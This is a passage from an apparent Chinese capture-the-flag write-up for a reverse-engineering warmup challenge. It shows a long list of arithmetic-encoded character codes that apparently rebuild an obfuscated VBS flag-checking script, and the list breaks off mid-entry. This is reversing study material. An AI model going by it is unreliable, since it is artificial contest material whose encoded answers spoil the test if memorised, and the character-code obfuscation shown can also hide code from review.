Reverse#
WARMUP#
vbs脚本,先写个脚本去混淆
src = [int( 667205/8665 ) , int( -7671+7786 ) , int( 8541-8438 ) , int( 422928/6408 ) , int( -1948+2059 ) , int( -3066+3186 ) , int( 756-724 ) , int( 4080/120 ) , int( -3615+3683 ) , int( -1619+1720 ) , int( -2679+2776 ) , int( 659718/5787 ) , int( 302752/9461 ) , int( -6627+6694 ) , int( -4261+4345 ) , int( 81690/1167 ) , int( 636180/9220 ) , int( 538658/6569 ) , int( -1542+1588 ) , int( -1644+1676 ) , int( 122184/1697 ) , int( 966411/9963 ) , int( 2186-2068 ) , int( -5283+5384 ) , int( 305056/9533 ) , int( 66402/651 ) , int( 1141452/9756 ) , int( 882090/8019 ) , int( -4243+4275 ) , int( 2669-2564 ) , int( 83+27 ) , int( 254880/7965 ) , int( -1291+1379 ) , int( -4699+4788 ) , int( 4730-4663 ) , int( -1179+1263 ) , int( 5274-5204 ) , int( 210144/6567 ) , int( -6803+6853 ) , int( 6655-6607 ) , int( 4067-4017 ) , int( 121900/2300 ) , int( -6158+6191 ) , int( 11934/351 ) , int( 64883/4991 ) , int( 65420/6542 ) , int( 3781-3679 ) , int( 1612-1504 ) , int( 892788/9204 ) , int( 927618/9006 ) , int( -6692+6724 ) , int( 410591/6731 ) , int( 6675-6643 ) , int( 697880/9560 ) , int( 4250-4140 ) , int( 5464-5352 ) , int( -1082+1199 ) , int( 3343-3227 ) , int( 1211-1145 ) , int( 482406/4346 ) , int( -5549+5669 ) , int( -5150+5190 ) , int( 4400-4366 ) , int( -3277+3346 ) , int( -6649+6759 ) , int( -5669+5785 ) , int( -6734+6835 ) , int( 9757-9643 ) , int( 109-77 ) , int( 5620-5504 ) , int( -2887+2991 ) , int( -3081+3182 ) , int( -5109+5141 ) , int( 699860/9998 ) , int( -3603+3679 ) , int( 1631-1566 ) , int( 445-374 ) , int( 294118/5071 ) , int( -1115+1149 ) , int( 222376/5054 ) , int( 8137-8105 ) , int( -1653+1687 ) , int( 357104/4058 ) , int( 1650-1561 ) , int( -9501+9568 ) , int( 1047-963 ) , int( 2540-2470 ) , int( 1692-1658 ) , int( 9947-9906 ) , int( 9186-9173 ) , int( -2846+2856 ) , int( 425187/3573 ) , int( -3066+3167 ) , int( 2850-2748 ) , int( -2992+3090 ) , int( 958230/8190 ) , int( 869295/7305 ) , int( 3380-3275 ) , int( -7338+7455 ) , int( 408848/4048 ) , int( 
9211-9179 ) , int( -2437+2498 ) , int( 1672-1640 ) , int( 2378-2344 ) , int( 544749/9557 ) , int( 351120/7315 ) , int( 773800/7738 ) , int( 2033-1931 ) , int( -8059+8111 ) , int( -4731+4783 ) , int( -9204+9252 ) , int( -4261+4316 ) , int( 850521/8421 ) , int( -7011+7112 ) , int( 292272/6089 ) , int( -8609+8666 ) , int( -2921+2972 ) , int( 6772-6672 ) , int( 487611/9561 ) , int( -6754+6802 ) , int( 464835/8155 ) , int( -939+987 ) , int( 421173/7389 ) , int( -8145+8201 ) , int( 9368-9268 ) , int( -7682+7738 ) , int( -8646+8699 ) , int( 484612/4996 ) , int( 286832/5516 ) , int( -9710+9760 ) , int( 884156/9022 ) , int( 7080-6979 ) , int( 265477/5009 ) , int( 6+49 ) , int( 5395-5298 ) , int( 6645-6595 ) , int( -9706+9763 ) , int( -6697+6752 ) , int( 927-870 ) , int( 4048-3946 ) , int( 34398/702 ) , int( 825675/8175 ) , int( -438+491 ) , int( 87808/1792 ) , int( -2601+2653 ) , int( 420228/7782 ) , int( -5266+5317 ) , int( 53059/547 ) , int( 477054/9354 ) , int( 9238-9189 ) , int( 799112/7912 ) , int( 3340-3284 ) , int( 8544-8444 ) , int( 1220-1171 ) , int( -7192+7245 ) , int( 73629/729 ) , int( 6523-6473 ) , int( 2761-2659 ) , int( 358124/3692 ) , int( -6167+6266 ) , int( -3842+3894 ) , int( 7840-7739 ) , int( -3980+4036 ) , int( 987-935 ) , int( 6868/68 ) , int( -559+656 ) , int( 6513-6465 ) , int( 843300/8433 ) , int( -8159+8261 ) , int( -753+807 ) , int( 278700/5574 ) , int( 5600/112 ) , int( -549+646 ) , int( -7697+7750 ) , int( 390292/7364 ) , int( 988020/9980 ) , int( -3250+3302 ) , int( 6295-6195 ) , int( 4342-4242 ) , int( -9602+9704 ) , int( 1312-1214 ) , int( 1065-1012 ) , int( 1122/22 ) , int( 191012/3604 ) , int( 330775/3275 ) , int( 226848/2224 ) , int( 4973-4922 ) , int( 369357/3657 ) , int( -7229+7282 ) , int( 588/12 ) , int( 57570/570 ) , int( 4554-4498 ) , int( 483924/4938 ) , int( 485600/9712 ) , int( 5051-4998 ) , int( 8467-8417 ) , int( -6799+6855 ) , int( 668360/6820 ) , int( 428008/7643 ) , int( -309+359 ) , int( -7495+7549 ) , int( 198200/1982 ) , 
int( -4298+4351 ) , int( 2979-2928 ) , int( -391+443 ) , int( -5951+6006 ) , int( -2271+2372 ) , int( 1431-1382 ) , int( -2812+2866 ) , int( 4906-4853 ) , int( -5308+5365 ) , int( -8587+8636 ) , int( -1003+1053 ) , int( 468741/4641 ) , int( 8449-8392 ) , int( 14877/261 ) , int( -5097+5146 ) , int( 6695-6646 ) , int( -2866+2922 ) , int( 483786/9486 ) , int( -4142+4193 ) , int( 2347-2296 ) , int( -1784+1833 ) , int( 116229/2193 ) , int( -1099+1148 ) , int( 8230-8180 ) , int( -4351+4406 ) , int( 1975-1924 ) , int( 779229/7871 ) , int( 102960/1040 ) , int( 67830/1330 ) , int( -4771+4873 ) , int( -32+129 ) , int( 155456/2776 ) , int( 9798-9700 ) , int( 4944-4894 ) , int( -2496+2594 ) , int( 5495-5444 ) , int( 8113-8015 ) , int( -8444+8496 ) , int( 3896-3847 ) , int( 6306-6255 ) , int( 1284-1185 ) , int( 1003986/9843 ) , int( -1321+1371 ) , int( 2676-2578 ) , int( -5421+5521 ) , int( 564186/5757 ) , int( 6608-6559 ) , int( 7038-6937 ) , int( 209720/3745 ) , int( -616+715 ) , int( 9766-9709 ) , int( 2111-2012 ) , int( 528993/9981 ) , int( 1901-1851 ) , int( 281344/5024 ) , int( 5695-5641 ) , int( 4815-4762 ) , int( 399556/3956 ) , int( 572730/5615 ) , int( -5718+5817 ) , int( 21+27 ) , int( 4532-4475 ) , int( -8446+8499 ) , int( 5786-5689 ) , int( 4177-4121 ) , int( -8411+8511 ) , int( -9499+9599 ) , int( 479528/8563 ) , int( 6850-6793 ) , int( -3725+3823 ) , int( -8692+8743 ) , int( 284298/2901 ) , int( 214302/4202 ) , int( 576675/5825 ) , int( -4565+4667 ) , int( -7223+7321 ) , int( 383278/3911 ) , int( -2540+2590 ) , int( 35+13 ) , int( -5549+5597 ) , int( 969122/9889 ) , int( 964712/9844 ) , int( -6231+6328 ) , int( -1560+1660 ) , int( -7416+7514 ) , int( 609144/5972 ) , int( 471432/9066 ) , int( -4500+4597 ) , int( 8620-8566 ) , int( 7113-7014 ) , int( -2488+2588 ) , int( -3599+3651 ) , int( 211956/6234 ) , int( 1697-1665 ) , int( -5122+5161 ) , int( -3189+3221 ) , int( -5840+114 ) , int( -37790+6278 ) , int( -8.231351E+07/3957 ) , int( -14110+7864 ) , int( 
-30457-1205 ) , int( 9930-9863 ) , int( 107-55 ) , int( 517-7291 ) , int( -31263+6916 ) , int( -29685+9083 ) , int( -2.138515E+07/3442 ) , int( -26304-1370 ) , int( -1.510879E+08/6060 ) , int( -903-3261 ) , int( -22484-8007 ) , int( -34437+5126 ) , int( -10635+3856 ) , int( -1.97004E+08/9374 ) , int( -1.079768E+08/6550 ) , int( -2.533546E+07/3739 ) , int( -25645+6931 ) , int( -1.720817E+08/7056 ) , int( -12498+5774 ) , int( -2.164872E+08/7546 ) , int( -8955-8316 ) , int( -3584+3597 ) , int( -1280+1290 ) , int( 795633/7041 ) , int( 291669/2451 ) , int( 9044-8942 ) , int( 264014/2614 ) , int( -7841+7873 ) , int( 10919/179 ) , int( 22272/696 ) , int( -8135+8169 ) , int( -5733+5847 ) , int( 371547/3753 ) , int( 473980/9115 ) , int( 391-284 ) , int( -1824+1925 ) , int( -1707+1828 ) , int( 2151-2117 ) , int( 2535/195 ) , int( 7236-7226 ) , int( 58097/4469 ) , int( 2710/271 ) , int( 118677/3043 ) , int( -7992+8024 ) , int( -5.682766E+07/8145 ) , int( -3.747722E+07/1805 ) , int( -20535-2876 ) , int( -5076000/750 ) , int( -28220-733 ) , int( -33583+7603 ) , int( 7730-7648 ) , int( 7057-6990 ) , int( 338728/6514 ) , int( -4.203267E+07/6205 ) , int( -20128-4219 ) , int( -29090+8488 ) , int( -7954+1177 ) , int( -25730+8808 ) , int( -23859-3357 ) , int( -2130+2143 ) , int( 6827-6817 ) , int( 4334-4264 ) , int( 4851-4734 ) , int( 5121-5011 ) , int( 7034-6935 ) , int( 4197-4081 ) , int( -1823+1928 ) , int( 1032744/9304 ) , int( 1547-1437 ) , int( -7393+7425 ) , int( 608932/7426 ) , int( 864513/7389 ) , int( 1748-1638 ) , int( 501676/6118 ) , int( 510473/7619 ) , int( -6752+6792 ) , int( -5142+5257 ) , int( -9558+9635 ) , int( 7906-7805 ) , int( 5308-5193 ) , int( 163300/1420 ) , int( 10961/113 ) , int( 740364/7188 ) , int( -5327+5428 ) , int( 5703-5659 ) , int( -7307+7339 ) , int( 445970/3878 ) , int( 608-492 ) , int( -4799+4913 ) , int( -3687+3762 ) , int( 9993-9892 ) , int( 1032493/8533 ) , int( 103607/2527 ) , int( 123266/9482 ) , int( 61520/6152 ) , int( 251424/7857 ) , int( 
104032/3251 ) , int( -7228+7260 ) , int( 239648/7489 ) , int( -1858+1926 ) , int( 865515/8243 ) , int( 818481/7509 ) , int( 244384/7637 ) , int( -4252+4359 ) , int( 10+66 ) , int( -3202+3303 ) , int( 466070/4237 ) , int( 3973-3929 ) , int( -7658+7690 ) , int( 563430/5366 ) , int( 168872/3838 ) , int( 306144/9567 ) , int( 158046/1491 ) , int( 311740/7085 ) , int( -6862+6894 ) , int( 621760/5360 ) , int( -8151+8252 ) , int( 9608-9499 ) , int( 309680/2765 ) , int( 244288/5552 ) , int( 6191-6159 ) , int( 705936/6303 ) , int( 4828-4717 ) , int( 1097330/9542 ) , int( 431596/9809 ) , int( -8819+8851 ) , int( 546675/4925 ) , int( 805545/6885 ) , int( -5087+5203 ) , int( 1223-1151 ) , int( 9566-9465 ) , int( 2413-2293 ) , int( 4760-4747 ) , int( -4859+4869 ) , int( 3357-3325 ) , int( 667-635 ) , int( -2223+2255 ) , int( 4357-4325 ) , int( 366928/5396 ) , int( 203175/1935 ) , int( -7837+7946 ) , int( 47936/1498 ) , int( 3589-3474 ) , int( 254920/6373 ) , int( 3498-3448 ) , int( 54113/1021 ) , int( 9319-9266 ) , int( 380767/9287 ) , int( 298804/6791 ) , int( -5151+5183 ) , int( 3487-3380 ) , int( 246760/6169 ) , int( 7465-7415 ) , int( -8879+8932 ) , int( -281+334 ) , int( 314470/7670 ) , int( -1151+1164 ) , int( 4880-4870 ) , int( 3582-3550 ) , int( 147008/4594 ) , int( 169248/5289 ) , int( -8224+8256 ) , int( 4654/358 ) , int( -2894+2904 ) , int( 3479-3447 ) , int( 2036-2004 ) , int( 7024-6992 ) , int( -8686+8718 ) , int( -664+703 ) , int( 53952/1686 ) , int( -10371+3595 ) , int( -21805-3310 ) , int( -1.930486E+08/8525 ) , int( -6242-530 ) , int( -2.479211E+08/9214 ) , int( -28712+8110 ) , int( 4047-9789 ) , int( 278397/4419 ) , int( -6794+6804 ) , int( 310624/9707 ) , int( 120896/3778 ) , int( 6925-6893 ) , int( 8256-8224 ) , int( -4736+4843 ) , int( 1256-1180 ) , int( 4250-4149 ) , int( -9132+9242 ) , int( 173344/5417 ) , int( -9030+9091 ) , int( 72-40 ) , int( 344204/4529 ) , int( 351985/3485 ) , int( 6120-6010 ) , int( 1113-1073 ) , int( 2781-2666 ) , int( 6375-6259 ) , 
int( 780330/6845 ) , int( 106050/1414 ) , int( 1239-1138 ) , int( -986+1107 ) , int( 324351/7911 ) , int( -7872+7885 ) , int( -1326+1336 ) , int( 17728/554 ) , int( 61600/1925 ) , int( -4930+4962 ) , int( 113856/3558 ) , int( -7210+7280 ) , int( 3126-3015 ) , int( 9894-9780 ) , int( 2040-2008 ) , int( 957810/9122 ) , int( -1680+1712 ) , int( -7068+7129 ) , int( -9765+9797 ) , int( 4121-4073 ) , int( -9924+9956 ) , int( -4370+4454 ) , int( 437340/3940 ) , int( 5315-5283 ) , int( 304500/6090 ) , int( -6807+6860 ) , int( 19186/362 ) , int( -6044+6057 ) , int( 9876-9866 ) , int( -2071+2103 ) , int( 8923-8891 ) , int( 4890-4858 ) , int( 7473-7441 ) , int( 5632-5600 ) , int( 8294-8262 ) , int( -271+303 ) , int( 6410-6378 ) , int( 5536-5421 ) , int( 44720/1118 ) , int( 6272-6167 ) , int( 26568/648 ) , int( 233440/7295 ) , int( -8944+9005 ) , int( 204192/6381 ) , int( 5731-5626 ) , int( 9617-9604 ) , int( 7388-7378 ) , int( 960/30 ) , int( 99008/3094 ) , int( 8422-8390 ) , int( 19136/598 ) , int( -6328+6360 ) , int( 199712/6241 ) , int( -2315+2347 ) , int( -6898+6930 ) , int( 9875-9768 ) , int( -4621+4661 ) , int( -7725+7830 ) , int( -3507+3548 ) , int( 4844-4812 ) , int( 570716/9356 ) , int( -3814+3846 ) , int( -1467+1532 ) , int( 138115/1201 ) , int( -7634+7733 ) , int( -7021+7061 ) , int( 942-865 ) , int( 924630/8806 ) , int( 8706-8606 ) , int( -6756+6796 ) , int( -5325+5440 ) , int( 2765-2649 ) , int( -7079+7193 ) , int( 2100/28 ) , int( 8156-8055 ) , int( -7792+7913 ) , int( 5324/121 ) , int( 6423-6391 ) , int( 5454-5414 ) , int( -4828+4933 ) , int( 13504/422 ) , int( 244552/3176 ) , int( -3016+3127 ) , int( -4103+4203 ) , int( 2567-2535 ) , int( 435-328 ) , int( 787-711 ) , int( 1474-1373 ) , int( 803550/7305 ) , int( -5410+5451 ) , int( -6556+6588 ) , int( -2204+2247 ) , int( 223424/6982 ) , int( -8753+8802 ) , int( 135872/3088 ) , int( -7757+7789 ) , int( 272-223 ) , int( 340177/8297 ) , int( 1487-1446 ) , int( -9083+9115 ) , int( 7132-7093 ) , int( 4540-4508 ) , 
int( -13541+6804 ) , int( -7.75285E+07/2501 ) , int( -32055+4060 ) , int( -1318-5661 ) , int( -5.265648E+07/3209 ) , int( -31857+4377 ) , int( 585065/9001 ) , int( -2558+2641 ) , int( -8549+8616 ) , int( 6403-6330 ) , int( 6271-6198 ) , int( -2.477346E+07/3988 ) , int( -17020-9885 ) , int( -2542488/104 ) , int( -1327+1340 ) , int( -887+897 ) , int( -7751+7783 ) , int( 2629-2597 ) , int( -6489+6521 ) , int( 2254-2222 ) , int( 154518/1981 ) , int( -764+865 ) , int( 629040/5242 ) , int( 1098636/9471 ) , int( 78793/6061 ) , int( -7110+7120 ) , int( -7378+7410 ) , int( -1777+1809 ) , int( 2538-2506 ) , int( 119392/3731 ) , int( -4327+4340 ) , int( 10580/1058 ) , int( -7677+7709 ) , int( 8254-8222 ) , int( 3782-3750 ) , int( 214240/6695 ) , int( 7006-6967 ) , int( 8305-8273 ) , int( 4841-4766 ) , int( 937-854 ) , int( 616460/9484 ) , int( -16-6721 ) , int( -28078-2921 ) , int( -24670-3325 ) , int( -9340+3372 ) , int( -25211-6560 ) , int( -22908+5154 ) , int( 6567-6554 ) , int( -635+645 ) , int( -5907+5939 ) , int( 4841-4809 ) , int( 20576/643 ) , int( -2196+2228 ) , int( 3270-3164 ) , int( 212384/6637 ) , int( 509533/8353 ) , int( 94368/2949 ) , int( -1648+1696 ) , int( 23335/1795 ) , int( -86+96 ) , int( 209408/6544 ) , int( 5186-5154 ) , int( 91072/2846 ) , int( 8978-8946 ) , int( 45850/655 ) , int( 256632/2312 ) , int( -8647+8761 ) , int( 5661-5629 ) , int( 191940/1828 ) , int( 2132-2100 ) , int( -9855+9916 ) , int( 3562-3530 ) , int( 24864/518 ) , int( 275424/8607 ) , int( 3176-3092 ) , int( 3798-3687 ) , int( -6055+6087 ) , int( -6024+6074 ) , int( -6425+6478 ) , int( -9745+9798 ) , int( 23387/1799 ) , int( -3891+3901 ) , int( -4637+4669 ) , int( -3183+3215 ) , int( 9860-9828 ) , int( 1677-1645 ) , int( 3698-3666 ) , int( -7915+7947 ) , int( 200128/6254 ) , int( -3984+4016 ) , int( 5982-5876 ) , int( -5627+5659 ) , int( 6122-6061 ) , int( -5851+5883 ) , int( 204520/5113 ) , int( -566+672 ) , int( 260512/8141 ) , int( 7314-7271 ) , int( -1563+1595 ) , int( 5079-4964 
) , int( 11680/292 ) , int( 8464-8359 ) , int( 6991-6950 ) , int( -3136+3168 ) , int( 4262-4219 ) , int( 4518-4486 ) , int( 9317-9210 ) , int( 7615-7575 ) , int( 55650/530 ) , int( 1185-1144 ) , int( 7853-7812 ) , int( -3099+3131 ) , int( 288288/3744 ) , int( -8871+8982 ) , int( -8502+8602 ) , int( 2470-2438 ) , int( 364100/7282 ) , int( -8754+8807 ) , int( 476874/8831 ) , int( 768-755 ) , int( 8485-8475 ) , int( -6548+6580 ) , int( 68960/2155 ) , int( 31904/997 ) , int( 113792/3556 ) , int( -8387+8419 ) , int( 116448/3639 ) , int( 279552/8736 ) , int( -2637+2669 ) , int( -5483+5599 ) , int( 4853-4752 ) , int( -7090+7199 ) , int( 544320/4860 ) , int( 305600/9550 ) , int( 510570/8370 ) , int( 72640/2270 ) , int( 3200-3085 ) , int( -6820+6860 ) , int( 396375/3775 ) , int( -7447+7488 ) , int( -9189+9202 ) , int( -4261+4271 ) , int( 1688-1656 ) , int( 9083-9051 ) , int( 9012-8980 ) , int( -3650+3682 ) , int( 291424/9107 ) , int( 842-810 ) , int( -7058+7090 ) , int( -7119+7151 ) , int( -4515+4630 ) , int( 9315-9275 ) , int( 2216-2111 ) , int( -1847+1888 ) , int( 100192/3131 ) , int( 8671-8610 ) , int( -1498+1530 ) , int( 5376-5261 ) , int( 965-925 ) , int( 597628/5638 ) , int( -6697+6738 ) , int( 9809-9796 ) , int( 740-730 ) , int( 4866-4834 ) , int( 8064-8032 ) , int( 8204-8172 ) , int( 6706-6674 ) , int( -3302+3334 ) , int( -9585+9617 ) , int( 8259-8227 ) , int( 9319-9287 ) , int( 6042-5927 ) , int( -4563+4603 ) , int( 843124/7954 ) , int( -468+509 ) , int( 91-59 ) , int( 55+6 ) , int( -470+502 ) , int( 8800-8684 ) , int( -732+833 ) , int( 1859-1750 ) , int( -9065+9177 ) , int( -3551+3564 ) , int( -5998+6008 ) , int( 309248/9664 ) , int( 78080/2440 ) , int( 1337-1305 ) , int( 1031-999 ) , int( -2405+2483 ) , int( 900011/8911 ) , int( 9591-9471 ) , int( 3993-3877 ) , int( 37024/2848 ) , int( 2372-2362 ) , int( -1999+2031 ) , int( 402-370 ) , int( 2339-2307 ) , int( 215232/6726 ) , int( 56706/4362 ) , int( 88610/8861 ) , int( 6347-6315 ) , int( -1057+1089 ) , int( 
-8215+8247 ) , int( -5359+5391 ) , int( 360048/9232 ) , int( 150208/4694 ) , int( 549760/6872 ) , int( 709710/8655 ) , int( -9253+9324 ) , int( -1875+1940 ) , int( 3060-9834 ) , int( -1.219054E+08/5007 ) , int( -16837-3765 ) , int( -13859+7384 ) , int( -40413+8132 ) , int( -7.735399E+07/3455 ) , int( -3620+3633 ) , int( 7370/737 ) , int( 9207-9175 ) , int( 21216/663 ) , int( -8881+8913 ) , int( 59712/1866 ) , int( 1881-1776 ) , int( 5987-5955 ) , int( 213378/3498 ) , int( 185536/5798 ) , int( -1106+1154 ) , int( -6274+6306 ) , int( 244-186 ) , int( -7680+7712 ) , int( 417216/3936 ) , int( 1383-1351 ) , int( 346419/5679 ) , int( -7913+7945 ) , int( 3201-3153 ) , int( 268160/8380 ) , int( -5532+5590 ) , int( -6959+6991 ) , int( 3356-3245 ) , int( -7222+7339 ) , int( 9549-9433 ) , int( -426+498 ) , int( 510555/5055 ) , int( 699720/5831 ) , int( -5601+5633 ) , int( 260653/4273 ) , int( 26752/836 ) , int( 4148-4114 ) , int( -6483+6517 ) , int( 120601/9277 ) , int( 92430/9243 ) , int( 3296/103 ) , int( 3355-3323 ) , int( 6661-6629 ) , int( -309+341 ) , int( -4300+4370 ) , int( 132090/1190 ) , int( 296742/2603 ) , int( -568+600 ) , int( 576016/5143 ) , int( 4279-4168 ) , int( -3514+3629 ) , int( -7862+7894 ) , int( 201544/3304 ) , int( 6720/210 ) , int( -1246+1295 ) , int( 6539-6507 ) , int( 7479-7395 ) , int( 685536/6176 ) , int( -7312+7344 ) , int( -2052+2128 ) , int( -8510+8611 ) , int( 311630/2833 ) , int( 8715-8675 ) , int( -6734+6849 ) , int( -5728+5805 ) , int( 9955-9854 ) , int( 269445/2343 ) , int( -4059+4174 ) , int( 47142/486 ) , int( 921-818 ) , int( 663-562 ) , int( 164328/4008 ) , int( 23634/1818 ) , int( 82110/8211 ) , int( 5730-5698 ) , int( 245312/7666 ) , int( 1656-1624 ) , int( 269536/8423 ) , int( 168864/5277 ) , int( -2835+2867 ) , int( -9348+9380 ) , int( 216128/6754 ) , int( -6873+6978 ) , int( 8769-8737 ) , int( -7159+7220 ) , int( -2374+2406 ) , int( 145560/3639 ) , int( 84945/809 ) , int( 4967-4935 ) , int( 3533-3490 ) , int( -8222+8254 ) , int( 
-5971+6020 ) , int( 203811/4971 ) , int( 64768/2024 ) , int( -8894+8971 ) , int( -7605+7716 ) , int( 7530-7430 ) , int( 8961-8929 ) , int( 204800/4096 ) , int( 34291/647 ) , int( 5124-5070 ) , int( 117455/9035 ) , int( 70910/7091 ) , int( 191072/5971 ) , int( -8276+8308 ) , int( 194464/6077 ) , int( 1606-1574 ) , int( 200032/6251 ) , int( -183+215 ) , int( 7729-7697 ) , int( -6288+6320 ) , int( 563-457 ) , int( 48544/1517 ) , int( 504-443 ) , int( -227+259 ) , int( 358600/8965 ) , int( 5705-5599 ) , int( -4736+4768 ) , int( 321554/7478 ) , int( -8525+8557 ) , int( 402615/3501 ) , int( 1320/33 ) , int( 233100/2220 ) , int( 7463-7422 ) , int( 8959-8918 ) , int( 9538-9506 ) , int( -3809+3886 ) , int( 17094/154 ) , int( 3305-3205 ) , int( 5389-5357 ) , int( 101450/2029 ) , int( -2702+2755 ) , int( 422-368 ) , int( 3681-3668 ) , int( 1374-1364 ) , int( 244192/7631 ) , int( 2106-2074 ) , int( 301504/9422 ) , int( 6788-6756 ) , int( 275072/8596 ) , int( -2612+2644 ) , int( 1544-1512 ) , int( 263424/8232 ) , int( 5985-5869 ) , int( 409555/4055 ) , int( 7844-7735 ) , int( 668752/5971 ) , int( 1110-1078 ) , int( -880+941 ) , int( 9828-9796 ) , int( 610650/5310 ) , int( -2213+2253 ) , int( 5697-5592 ) , int( 340505/8305 ) , int( 1757-1744 ) , int( 88340/8834 ) , int( 2986-2954 ) , int( -7747+7779 ) , int( 5952-5920 ) , int( 6697-6665 ) , int( 180160/5630 ) , int( 1671-1639 ) , int( -8613+8645 ) , int( 95904/2997 ) , int( 8994-8879 ) , int( 7256-7216 ) , int( -5776+5881 ) , int( 1529-1488 ) , int( 179680/5615 ) , int( -684+745 ) , int( 119840/3745 ) , int( 828000/7200 ) , int( -1371+1411 ) , int( 2474-2368 ) , int( 144033/3513 ) , int( 1617-1604 ) , int( 9503-9493 ) , int( -1100+1132 ) , int( 211680/6615 ) , int( 7607-7575 ) , int( 5777-5745 ) , int( 319712/9991 ) , int( -9605+9637 ) , int( 140672/4396 ) , int( 3740-3708 ) , int( 92575/805 ) , int( 9363-9323 ) , int( 292136/2756 ) , int( -9536+9577 ) , int( -9310+9342 ) , int( 7634-7573 ) , int( -9716+9748 ) , int( -7090+7206 
) , int( 376-275 ) , int( -6333+6442 ) , int( 3986-3874 ) , int( 3115-3102 ) , int( -2171+2181 ) , int( 100544/3142 ) , int( 74-42 ) , int( -1400+1432 ) , int( 81504/2547 ) , int( 5073-5041 ) , int( 4596-4564 ) , int( 9048-9016 ) , int( -2733+2765 ) , int( -4650+4663 ) , int( -151+161 ) , int( 10592/331 ) , int( 3163-3131 ) , int( 4722-4690 ) , int( 30624/957 ) , int( 2545-2513 ) , int( 251232/7851 ) , int( -2926+2958 ) , int( 239584/7487 ) , int( 389-350 ) , int( -2+34 ) , int( -5.053404E+07/7460 ) , int( -26034+1687 ) , int( -19313-1289 ) , int( -30-6697 ) , int( -17366-1346 ) , int( -15077-1903 ) , int( -6552-432 ) , int( -13927-3764 ) , int( -37232+7921 ) , int( 1107-7886 ) , int( -15477-5539 ) , int( -1.750707E+07/1062 ) , int( -3.826407E+07/5647 ) , int( 364959/5793 ) , int( 2034-2024 ) , int( -7296+7328 ) , int( -3111+3143 ) , int( -3156+3188 ) , int( 7990-7958 ) , int( 166496/5203 ) , int( -4151+4183 ) , int( 4071-4039 ) , int( 9102-9070 ) , int( -6166+6234 ) , int( 283185/2697 ) , int( 3833-3724 ) , int( 119776/3743 ) , int( 658224/5877 ) , int( 7881-7773 ) , int( 390328/4024 ) , int( 8122-8017 ) , int( 934010/8491 ) , int( 579751/8653 ) , int( -8024+8128 ) , int( 57036/588 ) , int( 2457-2343 ) , int( 9781-9737 ) , int( -5599+5631 ) , int( -7710+7809 ) , int( -4501+4606 ) , int( 625072/5581 ) , int( 783432/7533 ) , int( 877488/8688 ) , int( 6473-6359 ) , int( 5963-5897 ) , int( 150282/1242 ) , int( -9775+9891 ) , int( -7486+7587 ) , int( 565-552 ) , int( 5581-5571 ) , int( 771-739 ) , int( 69824/2182 ) , int( 4603-4571 ) , int( -5709+5741 ) , int( 8242-8210 ) , int( 94112/2941 ) , int( 100352/3136 ) , int( -8344+8376 ) , int( -1824+1936 ) , int( 6678-6570 ) , int( 638454/6582 ) , int( 6614-6509 ) , int( 1012990/9209 ) , int( 8744-8677 ) , int( 561912/5403 ) , int( 444163/4579 ) , int( 10089-9975 ) , int( 280960/8780 ) , int( 320128/5248 ) , int( -3399+3431 ) , int( -1771+1836 ) , int( 5417-5302 ) , int( -1824+1923 ) , int( 212600/5315 ) , int( -4973+5050 ) 
, int( 60060/572 ) , int( 639000/6390 ) , int( 355520/8888 ) , int( 866410/7534 ) , int( 5901-5824 ) , int( 9869-9768 ) , int( -4100+4215 ) , int( 9973-9858 ) , int( 601594/6202 ) , int( 857887/8329 ) , int( -7663+7764 ) , int( -205+249 ) , int( -5719+5751 ) , int( 8618-8506 ) , int( 822732/7412 ) , int( 9707-9592 ) , int( 106832/2428 ) , int( 1917-1885 ) , int( 7491-7442 ) , int( 263507/6427 ) , int( -3050+3091 ) , int( 6688/209 ) , int( 3579-3540 ) , int( 62400/1950 ) , int( -5.533603E+07/8508 ) , int( -1.094461E+07/378 ) , int( -19198-7803 ) , int( -1503-5013 ) , int( -22047-8352 ) , int( -9364+9447 ) , int( -3664+3731 ) , int( 7198-7125 ) , int( 6274-6201 ) , int( -16376+9628 ) , int( -3.882402E+07/1232 ) , int( -35990+7452 ) , int( 59020/4540 ) , int( 32900/3290 ) , int( 51776/1618 ) , int( -7782+7814 ) , int( 9795-9763 ) , int( 254592/7956 ) , int( 83520/2610 ) , int( 7721-7689 ) , int( -7133+7165 ) , int( 1340-1308 ) , int( 330066/3334 ) , int( -9106+9211 ) , int( 6064-5952 ) , int( 6286-6182 ) , int( -9220+9321 ) , int( -2056+2170 ) , int( 279444/4234 ) , int( 5693-5572 ) , int( 7627-7511 ) , int( 9114-9013 ) , int( 128864/4027 ) , int( 465247/7627 ) , int( -1215+1247 ) , int( 9956-9841 ) , int( -6215+6255 ) , int( 26080/652 ) , int( -5167+5282 ) , int( 296520/7413 ) , int( -5640+5745 ) , int( -8069+8110 ) , int( -740+772 ) , int( 92235/2145 ) , int( 6267-6235 ) , int( -3504+3619 ) , int( 11240/281 ) , int( 753448/7108 ) , int( -5324+5365 ) , int( -5911+5952 ) , int( -2746+2778 ) , int( -2953+3030 ) , int( 1074702/9682 ) , int( -3942+4042 ) , int( 8672-8640 ) , int( 3343-3293 ) , int( -9590+9643 ) , int( -1920+1974 ) , int( 190568/4648 ) , int( -8907+8939 ) , int( 4693-4605 ) , int( 4103-3992 ) , int( 1024974/8991 ) , int( 117216/3663 ) , int( -7725+7837 ) , int( 1025460/9495 ) , int( 6361-6264 ) , int( 925995/8819 ) , int( 166210/1511 ) , int( 8106-8039 ) , int( 256672/2468 ) , int( 8511-8414 ) , int( -1592+1706 ) , int( 4349-4336 ) , int( 20-10 ) , int( 
131648/4114 ) , int( 3440-3408 ) , int( 3286-3254 ) , int( 86528/2704 ) , int( -209+241 ) , int( 176256/5508 ) , int( -4786+4818 ) , int( 24576/768 ) , int( 973581/8771 ) , int( -5686+5803 ) , int( 1068012/9207 ) , int( 419760/5830 ) , int( 438138/4338 ) , int( 6119-5999 ) , int( 56320/1760 ) , int( -5861+5922 ) , int( -9201+9233 ) , int( 6816-6705 ) , int( 8085-7968 ) , int( -365+481 ) , int( 604944/8402 ) , int( 246238/2438 ) , int( -8362+8482 ) , int( 171296/5353 ) , int( -4409+4447 ) , int( 6653-6621 ) , int( 336856/4108 ) , int( -7684+7789 ) , int( 2731-2628 ) , int( 6687-6583 ) , int( 93496/806 ) , int( 1485-1445 ) , int( 5893-5859 ) , int( 410832/8559 ) , int( -4662+4696 ) , int( 44352/1386 ) , int( -9673+9711 ) , int( 86144/2692 ) , int( 507744/7052 ) , int( 9182-9081 ) , int( 7532-7412 ) , int( 8068-8028 ) , int( 921096/9304 ) , int( 7511-7406 ) , int( 542752/4846 ) , int( 7625-7521 ) , int( 811939/8039 ) , int( -5529+5643 ) , int( 366498/5553 ) , int( 